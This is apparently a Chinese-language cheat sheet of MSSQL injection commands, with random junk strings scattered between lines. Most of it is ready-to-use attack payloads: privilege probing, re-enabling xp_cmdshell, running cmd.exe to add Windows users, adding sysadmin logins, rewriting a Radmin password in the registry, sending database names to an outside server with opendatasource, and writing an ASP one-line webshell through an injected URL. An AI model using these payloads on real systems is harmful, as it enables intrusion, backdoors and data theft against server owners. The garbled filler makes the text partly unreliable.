常用的一些注入命令

admin

//看看是什么权限的
- E% i7 I& g" z# Q4 `: kand 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
' _# O# X4 m: P$ Kand 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
5 m% I+ ?% i4 ]0 w! B. ~  X/ {! c
7 K# R* i! u6 H. Z
数字类型
and char(124)%2Buser%2Bchar(124)=0

# P  n9 G0 f/ G字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
& @: r  ^. Y5 Q$ O$ o$ i: O
搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
3 `/ N* s% C% \0 I
爆用户名
and user>0
6 @/ K6 s6 A. L2 O7 L' and user>0 and ''='

9 {4 v+ x) [) K  j. T# T" M5 ]检测是否为SA权限
" M8 h3 f! x5 Z/ I8 X8 sand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
3 S3 ^8 @& a* P- e  O" |* ~And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
+ o$ ]1 l' X0 l. u: s/ i
5 D/ w0 e$ P' ^6 m8 u  e# |检测是不是MSSQL数据库
and exists (select * from sysobjects);--

检测是否支持多行
;declare @d int;--
, [1 i7 M0 O( ~9 D4 l) i3 C* `
& e! q9 D2 |1 o1 Q恢复 xp_cmdshell
/ o$ k( a( L3 |$ W;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
- z6 r  F5 x8 w( r5 w5 b5 r: F
4 M1 q9 i" z5 R/ Z+ ]9 w
( w  o- |4 A6 e8 M0 Y" Kselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------
//       执行命令
( I% q! e1 o& Y$ V& t//-----------------------
- ^" o7 M: X. ~1 l2 M; v/ m首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

% `6 z8 B" V5 }( W: k7 Q5 ]然后利用jet.oledb执行系统命令
- M9 N1 h9 y; K6 |- s( [- U, Qselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
. [" c7 ~& R1 F% A" t7 Z
执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
& F  j) J7 g6 n9 z$ p& X* Z9 ]% A: y
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

- Z5 x3 J7 a( {" U# ]判断xp_cmdshell扩展存储过程是否存在：
3 p4 G$ i% `: ?. G) Z3 @http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
) w2 O6 f% @* @# {" J7 |
写注册表
3 _2 s5 g3 y- \; xexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
* s- W( f' R  S/ w. D9 K# J
REG_SZ

* h- l( H/ f) ]读注册表
) s* |4 D5 y( H6 r$ Uexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

9 a- w0 E3 U, W9 \- H( b读取目录内容
" v- o" ?0 v$ _8 M4 {exec master..xp_dirtree 'c:\winnt\system32\',1,1
" x( N8 k( y- C. U7 j

数据库备份
; R; c8 Y  L7 }0 v( t, e8 N# t" s: sbackup database pubs to disk = 'c:\123.bak'

//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
7 F8 i/ P2 q9 G9 M3 {5 ?7 d
! {* L( }5 N4 x/ N0 I* l
0 U" }& l; C5 T4 }7 |: b# u8 i8 a
: p% t( f/ N" v. w. A/ C更改sa口令方法：用sql综合利用工具连接后，执行命令：
+ r6 c, b( P( g; y3 b9 s) S: g) xexec sp_password NULL,'新密码','sa'
* P0 z; u- t1 l0 y
# c5 F8 s1 N  a" I9 M9 G添加和删除一个SA权限的用户test：
exec master.dbo.sp_addlogin test,9530772
exec master.dbo.sp_addsrvrolemember test,sysadmin

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

& E" o) D% u% Q+ _3 \添加扩展存储过过程
4 }4 U5 Y% x( \EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public


- Q: M# _  z. M停掉或激活某个服务。

exec master..xp_servicecontrol 'stop','schedule'
( k& c( y7 ]$ X- G' f8 \/ t! aexec master..xp_servicecontrol 'start','schedule'
8 `# r' m; @1 B: ?, ]
dbo.xp_subdirs

+ t$ W/ m- `+ F只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab

# g- X/ U# C( o1 S  i# P+ V: V! j将目标多个档案压缩到某个目标档案之内。
1 T+ M7 z" ]' D' N所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
* c) b" D" y& J2 T. ~'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

% X9 M% q0 \: uxp_terminate_process

* {# C, ]# `0 t5 o+ S) z停掉某个执行中的程序，但赋予的参数是 Process ID。
  i0 x- q2 M# G; x! C& B0 @9 O& E利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
- C& h3 M8 q! A5 _; ]- N. G
! z" f" c# c$ h0 x4 Exp_terminate_process 2484
+ e' U9 l" x( ?  a/ ?
5 z" f3 p% i; h* s4 i8 Ixp_unpackcab
2 g4 }3 {7 ?& U, q/ y' s2 f* U4 v! L  V
  o0 _" K' H" Z1 _解开压缩档。

xp_unpackcab 'c:\test.cab','c:\temp',1


某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

) y: i: z7 _% z( k1 |- q0 ?create database lcx;
; `5 G8 N# e7 [- ^Create TABLE ku(name nvarchar(256) null);
0 Z; o. c1 I- B& N! X/ yCreate TABLE biao(id int NULL,name nvarchar(256) null);
% v! P/ D! [+ i/ L; \
2 |0 V# p- n) F' n' J- m//得到数据库名
! W9 f: Q" G' `7 sinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
4 ?$ b6 Q# h0 v! `

) Z! H4 P2 X; _4 A4 r//在Master中创建表，看看权限怎样
8 A' u4 k) G5 v* d1 p" ?Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

) B6 c+ w/ l/ w6 w9 s//更新表内容
& z8 k% _  `( S* E6 V3 u% JUpdate films SET kind = 'Dramatic' Where id = 123
5 \7 h- p4 @# m0 Z
+ r: s1 O: ?5 g9 d1 h& w! a//删除内容
+ d) G7 \( I. H5 y  e) |delete from table_name where Stockid = 3